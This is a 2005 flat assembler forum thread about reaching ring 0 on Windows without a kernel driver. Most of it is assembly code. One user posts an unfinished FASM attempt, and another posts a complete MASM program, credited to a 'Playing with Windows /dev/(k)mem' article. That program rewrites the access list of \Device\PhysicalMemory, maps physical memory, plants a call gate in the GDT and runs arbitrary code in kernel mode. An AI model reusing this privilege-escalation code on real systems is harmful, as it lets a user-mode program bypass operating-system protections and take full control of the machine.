flat assembler
Message board for the users of flat assembler.

Index > Windows > ring 0 without a kernel mode driver

Author
Thread Post new topic Reply to topic
r22



Joined: 27 Dec 2004
Posts: 805
r22 29 Jan 2005, 18:34
I've been wanting to get to r0 without having to use a driver, the following code doesn't work but it's a start.
Help in finishing would be appreciated.
Code:
format PE GUI 4.0
entry Start

include '%fasminc%\win32a.inc'

section '.data' data readable writeable
fmt   db '%lu',0
buffr rb 32
rjunk dd 0
myPID dd 0
pAddr dd 0
ntBad dd 0
devPhy db '\',0,'D',0,'e',0,'v',0,'i',0,'c',0,'e',0,'\',0,'P',0,'h',0,'y',0,'s',0,'i',0,'c',0,'a',0,'l',0,'M',0,'e',0,'m',0,'o',0,'r',0,'y',0,0,0
uniPhys db ',',0,2eh,0
    dd devPhy
phyMem db 18h,0,0,0,0,0,0,0
       dd uniPhys
       db 40h,0,0,0
       dd 0,0
hFileMapObj dd 0


section '.code' code readable executable

Start:
   call [GetCurrentProcessId]
  mov [myPID], eax
    db 64h,67h,0FFh,36h,0,0 ; push dword ptr fs:[0]
 db 64h,67h,89h,26h,0,0 ; mov fs:0, esp
  mov esi, 100000h
    push 4
      push 1000h
  push esi
    push 0
      call [VirtualAlloc]
 mov [pAddr], eax
    push dword rjunk
    push esi
    push eax
    push dword 0Bh
      call [NtQuerySystemInformation]

 mov ebx, dword[pAddr]
       mov eax, [ebx+0ch]
  mov [ntBad],eax

 mov edi,phyMem
      mov ebx,hFileMapObj
 push edi
    push dword 2
        push ebx
    call [NtOpenSection]
        push eax
    push fmt
    push buffr
  call [wsprintf]
       push 0
       push buffr
       push buffr
       push 0
       call [MessageBox]
     call [ExitProcess]

r0code:


section '.idata' import data readable writeable

  library kernel32,'KERNEL32.DLL',\
      advapi32,'ADVAPI32.DLL',\
        ntdll,'NTDLL.DLL',\
      user32,'USER32.DLL'
      import ntdll,\
      NtUnmapViewOfSection,'NtUnmapViewOfSection',\
      NtQuerySystemInformation,'NtQuerySystemInformation',\
      NtOpenSection,'NtOpenSection',\
      NtMapViewOfSection,'NtMapViewOfSection'

      include  "%fasminc%\apia\kernel32.inc"
      include  "%fasminc%\apiw\advapi32.inc"
      include  "%fasminc%\apia\user32.inc"


section '.reloc' fixups data discardable
    
Post 29 Jan 2005, 18:34
View user's profile Send private message AIM Address Yahoo Messenger Reply with quote
HarryTuttle



Joined: 26 Sep 2003
Posts: 211
Location: Poland
HarryTuttle 31 Jan 2005, 20:01
why

db 64h,67h,0FFh,36h,0,0 instead of simple: push [fs:0] ?
is it better?

Smile

_________________
Microsoft: brings power of yesterday to computers of today.
Post 31 Jan 2005, 20:01
View user's profile Send private message Reply with quote
beppe85



Joined: 23 Oct 2004
Posts: 181
beppe85 31 Jan 2005, 20:50
HarryTuttle wrote:
why

db 64h,67h,0FFh,36h,0,0 instead of simple: push [fs:0] ?
is it better?

Smile


Instructions one byte shorter. I remember I had saw in a thread about this, taking a word address to load a dword. Both disassembly the same and do the same.

_________________
"I assemble, therefore I am"

If you got some spare time, visit my blog: http://www.beppe.theblog.com.br/ and sign my guestmap
Post 31 Jan 2005, 20:50
View user's profile Send private message Reply with quote
Tomasz Grysztar



Joined: 16 Jun 2003
Posts: 8356
Location: Kraków, Poland
Tomasz Grysztar 31 Jan 2005, 21:31
It should be:
Code:
push dword [fs:word 0]    
Post 31 Jan 2005, 21:31
View user's profile Send private message Visit poster's website Reply with quote
r22



Joined: 27 Dec 2004
Posts: 805
r22 01 Feb 2005, 05:49
I made the code in version .56 so I had to use db in .57 it should work the normal way.
Anyways I'm going to try and implement the functions in advapi that I need to use to get access to /Device/PhysicalMemory then I'll repost an update.
Post 01 Feb 2005, 05:49
View user's profile Send private message AIM Address Yahoo Messenger Reply with quote
r22



Joined: 27 Dec 2004
Posts: 805
r22 01 Feb 2005, 08:24
Code:
format PE GUI 4.0
entry Start

include '%fasminc%\win32a.inc'



section '.data' data readable writeable
fmt   db '%lu',0
buffr rb 32
rjunk dd 0
myPID dd 0
pAddr dd 0
ntBad dd 0
MmIs  db 'MmIsAddressValid',0
MmIsAddressValid dd 0
dAccess db 2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0
        dd CUser
CUser   db 'C',0,'U',0,'R',0,'R',0,'E',0,'N',0,'T',0,5fh,0,'U',0,'S',0,'E',0,'R',0,0,0

align 4
devPhy db '\',0,'D',0,'e',0,'v',0,'i',0,'c',0,'e',0,'\',0,'P',0,'h',0,'y',0,'s',0,'i',0,'c',0,'a',0,'l',0,'M',0,'e',0,'m',0,'o',0,'r',0,'y',0,0,0
uniPhys db ',',0,2eh,0
        dd devPhy
align 4
phyMem db 18h,0,0,0,0,0,0,0
       dd uniPhys
       db 40h,0,0,0
       dd 0,0
hFileMapObj dd 0
DACL dd 0
NewACL dd 0
SecurityD dd 0
kernelLib dd 0
kernelBase dd 0


section '.code' code readable executable

Start:
        call [GetCurrentProcessId]
        mov [myPID], eax
        push dword [FS: word 0]
        mov [fs: word 0],esp

        push 4
        push 1000h
        push 100000h
        push 0
        call [VirtualAlloc]
        mov [pAddr], eax
        push dword rjunk ;out ret len
        push 100000h
        push dword[pAddr]
        push dword 0Bh
        call [NtQuerySystemInformation]
        mov edx, dword[pAddr]
        mov eax, [edx+0ch]
        mov [ntBad],eax  ;kernel base addr

        push phyMem
        push 60000h ;read write DAC
        push hFileMapObj
        call [NtOpenSection]
        push SecurityD
        push 0
        push DACL
        push 0
        push 0
        push 4
        push 6
        push [hFileMapObj]
        call [GetSecurityInfo]
        push NewACL
        push [DACL]
        push dAccess
        push 1
        call [SetEntriesInAcl] ;WideChar note .idata
        push 0
        push [NewACL]
        push 0
        push 0
        push 4
        push 6
        push [hFileMapObj]
        call [SetSecurityInfo]
        push [NewACL]
        call [LocalFree]
        push [SecurityD]
        call [LocalFree]
        push [hFileMapObj]
        call [CloseHandle]
        push phyMem
        push 2
        push hFileMapObj
        call [NtOpenSection]
        mov edx,[pAddr]
        movzx eax,word[edx+1eh]
        lea eax,[eax+edx+20h]
        push 1
        push 0
        push eax
        call [LoadLibrary]
        mov [kernelLib],eax
        push MmIs
        push eax
        call [GetProcAddress]
        sub eax,[kernelLib]
        add eax,[ntBad]  ;real addr
        mov [MmIsAddressValid],eax
        mov esi,[kernelLib]
        mov ecx,[esi+3ch]
        add ecx,esi
        mov eax,[ecx+34h]
        mov ecx,[ecx+50h]
        add ecx,esi
        mov [kernelBase],eax
        ; ok now find PsActiveProcessHead
        ;first find "push 'egap'" 68 50 41 47 45
morefind:
        cmp     esi,ecx
        jae     failure
        lodsd
        sub     esi,3
        cmp     eax,47415068h
        jnz     morefind
        cmp     byte [esi+3],45h
        jnz     morefind
        dec     esi
;more to come getting close to making the r3 to r0 call gate
        push eax
        push fmt
        push buffr
        call [wsprintf]
failure:
       push 0
       push buffr
       push buffr
       push 0
       call [MessageBox]
        call [ExitProcess]

r0code:


section '.idata' import data readable writeable

  library kernel32,'KERNEL32.DLL',\
          advapi32,'ADVAPI32.DLL',\
          ntdll,'NTDLL.DLL',\
          user32,'USER32.DLL'
      import ntdll,\
      NtUnmapViewOfSection,'NtUnmapViewOfSection',\
      NtQuerySystemInformation,'NtQuerySystemInformation',\
      NtOpenSection,'NtOpenSection',\
      NtMapViewOfSection,'NtMapViewOfSection'

      include  "%fasminc%\apia\kernel32.inc"
      include  "%fasminc%\apiw\advapi32.inc"
      include  "%fasminc%\apia\user32.inc"


section '.reloc' fixups data discardable
    

I had to align phyMem so it would work and I also added the advapi functions needed.
Post 01 Feb 2005, 08:24
View user's profile Send private message AIM Address Yahoo Messenger Reply with quote
Madis731



Joined: 25 Sep 2003
Posts: 2139
Location: Estonia
Madis731 01 Feb 2005, 08:38
What is the reference you're using? I just can't understand where do you get all this.
Post 01 Feb 2005, 08:38
View user's profile Send private message Visit poster's website Yahoo Messenger MSN Messenger Reply with quote
Tomasz Grysztar



Joined: 16 Jun 2003
Posts: 8356
Location: Kraków, Poland
Tomasz Grysztar 01 Feb 2005, 08:53
One more thing. Instead of:
Code:
db 'C',0,'U',0,'R',0,'R',0,'E',0,'N',0,'T',0,5fh,0,'U',0,'S',0,'E',0,'R',0,0,0    

you can write:
Code:
du 'CURRENT_USER',0    
Post 01 Feb 2005, 08:53
View user's profile Send private message Visit poster's website Reply with quote
HarryTuttle



Joined: 26 Sep 2003
Posts: 211
Location: Poland
HarryTuttle 02 Feb 2005, 08:03
Code:
;**********************************************************************************************;
;                          Tentative de ring0 sous un OS U kernel NT                           ;
;               basé sur l'article "Playing with Windows /dev/(k)mem" de crazylord             ;
;                                                                                              ;
;   27/08/03 Chrishka   commentaires,suggestions,nimp : chris.j84@free.fr                      ;
;**********************************************************************************************;


.386
.model flat,stdcall
option casemap :none

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib

;!==================================================================================!;
;   masm32 v8 ne fournit pas de library et d'include pour ntdll.dll                  ;
;   j'ai fait ceux-lU U l'arrache (j'ai mis que ce dont j'avais besoin),             ;
;   si vous en avez un mieux n'hésitez pas                                           ;
;                                                                                    ;
include \masm32\include\ntdll.inc                                                    ;
includelib \masm32\lib\ntdll.lib                                                     ;
;                                                                                    ;
;!==================================================================================!;



;______________________________________________________________________________________________________________________
;
;   les données
;______________________________________________________________________________________________________________________


.data?

    ALIGN   DWORD

        dacl            dd      ?
        nexp            dd      ?

        hPhysicMem      dd      ?

        pSecuDescript   dd      ?

        pOldDacl        dd      ?
        pNewDacl        dd      ?

        unicode_str     dw      ?                                       ;UNICODE_STRING{    USHORT          Length
                        dw      ?                                       ;                   USHORT          MaxLength
                        dd      ?                                       ;                   PWSTR           Buffer };

        obj_attrib      dd      ?                                       ;OBJECT_ATTRIBUTES{ ULONG           Length
                        dd      ?                                       ;                   HANDLE          RootDirectory
                        dd      ?                                       ;                   UNICODE_STRING* ObjectName
                        dd      ?                                       ;                   ULONG           Attributes
                        dd      ?                                       ;                   VOID*           SecurityDescriptor
                        dd      ?                                       ;                   VOID*           SecurityQualityOfService };

        Exp_Access      dd      ?                                       ;EXPLICIT_ACCESS{   DWORD           grfAccessPermissions
                        dd      ?                                       ;                   ACCESS_MODE     grfAccessMode
                        dd      ?                                       ;                   DWORD           grfInheritance
                                                                        ;                   TRUSTEE         Trustee };

                        dd      ?                                       ;TRUSTEE{           TRUSTEE*        pMultipleTrustee
                        dd      ?                                       ;                   MULTIPLE_TRUSTEE_OPERATION MultipleTrusteeOperation
                        dd      ?                                       ;                   TRUSTEE_FORM    TrusteeForm
                        dd      ?                                       ;                   TRUSTEE_TYPE    TrusteeType
                        dd      ?                                       ;                   LPSTR           ptstrName };

        gdt             dw      ?                                       ;KGDTENTRY{         WORD            LimitLow
                        dw      ?                                       ;                   WORD            BaseLow
                        dw      ?                                       ;                   WORD            BaseHigh };

        pad1            dw      ?

        Callgate        dq      ?                                       ;                  PHYSICAL_ADDRESS pAddress
                        dd      ?                                       ;                   VOID*           MappedAddress
                        dd      ?                                       ;                   CALLGATE_DESC*  pDesc
                        dw      ?                                       ;                   WORD            Segment
                        dw      ?                                       ;                   WORD            LastEntry

        ViewSize        dd      ?

        CgCall          df      ?

        pad2            dw      ?

        udevname        db      46 dup(?)

.const

        modname         db      "Ring0",0

        err1            db      "error",0
        err2            db      "error : access denied",0

        devname         db      "\device\physicalmemory",0

        user            db      "CURRENT_USER",0

;______________________________________________________________________________________________________________________


;______________________________________________________________________________________________________________________
;
;   le code
;______________________________________________________________________________________________________________________

.code

Start:
;______________________________________________________________________________________________________________________


        invoke      MultiByteToWideChar,CP_ACP,MB_PRECOMPOSED,addr devname,-1,addr udevname,23

        invoke      RtlInitUnicodeString,addr unicode_str,addr udevname

        mov         ebx,offset obj_attrib
        mov         dword ptr [ebx],24                                    ; sizeof(OBJECT_ATTRIBUTES)
        mov         dword ptr [ebx+4],NULL
        mov         dword ptr [ebx+8],offset unicode_str
        mov         dword ptr [ebx+12],OBJ_CASE_INSENSITIVE
        or          dword ptr [ebx+12],OBJ_KERNEL_HANDLE
        mov         dword ptr [ebx+16],NULL
        mov         dword ptr [ebx+20],NULL

        mov         edx,SECTION_MAP_READ
        or          edx,SECTION_MAP_WRITE
        invoke      NtOpenSection,addr hPhysicMem,edx,ebx

        .IF eax != ERROR_SUCCESS
            .IF eax == ACCESS_DENIED
                jmp         needrw
            .ELSE
                invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
                jmp         fin
            .ENDIF
        .ELSE
            mov         pOldDacl,NULL
            jmp     rw
        .ENDIF

needrw: mov         edx,WRITE_DAC
        or          edx,READ_CONTROL
        invoke      NtOpenSection,addr hPhysicMem,edx,addr obj_attrib

        .IF eax != ERROR_SUCCESS
            .IF eax == ACCESS_DENIED
                invoke      MessageBox,NULL,addr err2,addr modname,MB_OK
                jmp         fin
            .ELSE
                invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
                jmp         fin
            .ENDIF
        .ENDIF


        invoke      GetSecurityInfo,hPhysicMem,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,addr pOldDacl,NULL,addr pSecuDescript

        .IF eax != ERROR_SUCCESS
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        mov         ebx,offset Exp_Access
        mov         dword ptr [ebx],SECTION_ALL_ACCESS
        mov         dword ptr [ebx+4],GRANT_ACCESS
        mov         dword ptr [ebx+8],NO_INHERITANCE
        mov         dword ptr [ebx+12],NULL
        mov         dword ptr [ebx+16],NO_MULTIPLE_TRUSTEE
        mov         dword ptr [ebx+20],TRUSTEE_IS_NAME
        mov         dword ptr [ebx+24],TRUSTEE_IS_USER
        mov         dword ptr [ebx+28],offset user

        invoke      SetEntriesInAcl,1,addr Exp_Access,pOldDacl,addr pNewDacl

        .IF eax != ERROR_SUCCESS
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        invoke      SetSecurityInfo,hPhysicMem,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL

        .IF eax != ERROR_SUCCESS
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        invoke      LocalFree,pNewDacl
        invoke      LocalFree,dacl
        invoke      LocalFree,pSecuDescript
        invoke      NtClose,hPhysicMem
        mov         hPhysicMem,NULL

;______________________________________________________________________________________________________________________
;
;   installation du callgate
;______________________________________________________________________________________________________________________


        mov         edx,SECTION_MAP_READ
        or          edx,SECTION_MAP_WRITE
        invoke      NtOpenSection,addr hPhysicMem,edx,addr obj_attrib

        .IF eax != ERROR_SUCCESS
            .IF eax == 0C0000022h
                invoke      MessageBox,NULL,addr err2,addr modname,MB_OK
                jmp         fin
            .ELSE
                invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
                jmp         fin
            .ENDIF
        .ENDIF


rw:     sgdt        gdt
        mov         ebx,offset gdt
        movzx       eax,word ptr [ebx+2]
        movzx       edx,word ptr [ebx+4]
        shl         edx,16
        or          edx,eax

        .IF (edx < 80000000h) || (edx >= 0A0000000h)
            and         edx,0FFFF000h
        .ELSE
            and         edx,1FFFF000h
        .ENDIF

        mov         ebx,offset Callgate

        mov         dword ptr [ebx],edx
        mov         dword ptr [ebx+4],0

        push        PAGE_READWRITE
        push        0
        push        1
        movzx       edx,word ptr gdt
        mov         ViewSize,edx
        push        offset ViewSize
        mov         eax,offset Callgate
        push        eax
        push        edx
        push        0
        add         eax,8
        push        eax
        push        -1
        push        hPhysicMem
        call        NtMapViewOfSection

        .IF eax != ERROR_SUCCESS
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        mov         ebx,offset Callgate
        mov         dword ptr [ebx+12],NULL
        mov         dx,gdt
        and         dx,0FFF8h
        movzx       eax,dx
        mov         ecx,[ebx+8]
        add         eax,ecx

        .WHILE eax > ecx                                                ; recherche d'un callgate descriptor libre dans la gdt.
                                                                        ; on regarde si le bit 'present' est U 0. s'il est U
            and         byte ptr [eax+5],80h                            ; 1, c'est que la place est prise donc...
            jne         @f                                              ; ... on cherche ailleurs

            mov         edx,Ring0
            mov         word ptr [eax],dx                               ; mot de poids faible de l'adresse de la fonction Ring0
            mov         word ptr [eax+2],KGDT_R0_CODE
            mov         byte ptr [eax+4],1                              ; nombre de param
tres de Ring0, on passe 1 param
tre
                                                                        ; attention, le nombre de param
tre n'est codé que sur les
                                                                        ; 4 premiers bits de cet octet, donc pas plus de 15 param
tres
                                                                        ; sinon on met U 1 des bits qui doivent tre U 0 dans cet octet
            mov         byte ptr [eax+5],0ECh
            shr         edx,16
            mov         word ptr [eax+6],dx                             ; mot de poids fort de l'adresse de la fonction Ring0
            mov         dword ptr [ebx+12],eax
            jmp         fwh

@@:         sub         eax,8

        .ENDW

fwh:
        .IF dword ptr [ebx+12] == NULL                                                 ; a-t-on trouvé un callgate descriptor libre ? si non, on arrte lU
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        mov         edx,offset CgCall
        sub         eax,ecx
        or          al,3
        mov         word ptr [edx+4],ax
        mov         dword ptr [edx],0

;______________________________________________________________________________________________________________________
;
;   Appel de la fonction Ring0
;______________________________________________________________________________________________________________________


        push        12345678h                                           ; exemple de param
tre
        call        fword ptr [CgCall]

;______________________________________________________________________________________________________________________
;
;   Désinstallation du callgate + un peu de nettoyage
;______________________________________________________________________________________________________________________


        mov         ebx,offset Callgate
        mov         edi,[ebx+12]
        xor         eax,eax
        stosd
        stosd

        invoke      NtUnmapViewOfSection,-1,dword ptr [ebx+8]
        invoke      NtClose,hPhysicMem

        .IF pOldDacl != NULL
            mov         edx,WRITE_DAC
            or          edx,READ_CONTROL
            invoke      NtOpenSection,addr hPhysicMem,edx,addr obj_attrib
            invoke      GetSecurityInfo,hPhysicMem,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,addr pOldDacl,NULL,addr pSecuDescript
            mov         ebx,offset Exp_Access
            mov         dword ptr [ebx],SECTION_ALL_ACCESS
            mov         dword ptr [ebx+4],REVOKE_ACCESS
            mov         dword ptr [ebx+8],NO_INHERITANCE
            mov         dword ptr [ebx+12],NULL
            mov         dword ptr [ebx+16],NO_MULTIPLE_TRUSTEE
            mov         dword ptr [ebx+20],TRUSTEE_IS_NAME
            mov         dword ptr [ebx+24],TRUSTEE_IS_USER
            mov         dword ptr [ebx+28],offset user
            invoke      SetEntriesInAcl,1,addr Exp_Access,pOldDacl,addr pNewDacl
            invoke      SetSecurityInfo,hPhysicMem,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL
            invoke      NtClose,hPhysicMem
        .ENDIF

;______________________________________________________________________________________________________________________


fin:    invoke      ExitProcess,0

;______________________________________________________________________________________________________________________


;______________________________________________________________________________________________________________________
;
;   LA fonction qui va tourner en kernel mode
;   elle ne fait rien, U vous de la remplir Smile, mais /!\ prudence /!\, le syst
me se
;   remet tr
s difficilement d'une erreur en kernel mode, allez-y avec des pincettes,
;   je me suis tapé des dizaines d'écrans bleu sous 2000 en développant ce truc...
;______________________________________________________________________________________________________________________


Ring0 PROC

        pushf                                           ; on sauvegarde les flags

        mov         eax,[esp+10]                        ; on récup
re le param
tre dans eax.

        cli                                             ; some privileged instructions...
        mov         ebx,cr0
        mov         ecx,dr7                             ; dedicated to roticv lol

        popf                                            ; restore les flags, réactive les interruptions au passage
        retf        4                                   ; on désempile un double mot

Ring0 ENDP

;______________________________________________________________________________________________________________________


end             Start
    

_________________
Microsoft: brings power of yesterday to computers of today.
Post 02 Feb 2005, 08:03
View user's profile Send private message Reply with quote
r22



Joined: 27 Dec 2004
Posts: 805
r22 02 Feb 2005, 18:54
Yep thats the stuff, porting it to fASM from mASM is a pain in EL BUTT though:P
Post 02 Feb 2005, 18:54
View user's profile Send private message AIM Address Yahoo Messenger Reply with quote
BoR0



Joined: 12 Nov 2004
Posts: 31
BoR0 03 Feb 2005, 22:03
Hi guys.. I've been all over the net and couldn't find ntdll.inc and ntdll.lib (though I found some files but the equates were not there).

I'd really appreciate it if you can zip that masm "ring3 to ring0" source with all the needed and include files.

Thanks. Smile
Post 03 Feb 2005, 22:03
View user's profile Send private message Reply with quote
r22



Joined: 27 Dec 2004
Posts: 805
r22 04 Feb 2005, 02:03
the ntdll includes and libs aren't in the version of masm32 i have, I assume they were user made and not included with the code snippet from Harry Tuttle.

Its a shame the MASM source is so ambiguous, I guess the person coding it was trying to optimize, also I don't read the language the comments are in:P

I wanted to compile it and then just use my disassembler at look at the source without all the macros.
Post 04 Feb 2005, 02:03
View user's profile Send private message AIM Address Yahoo Messenger Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.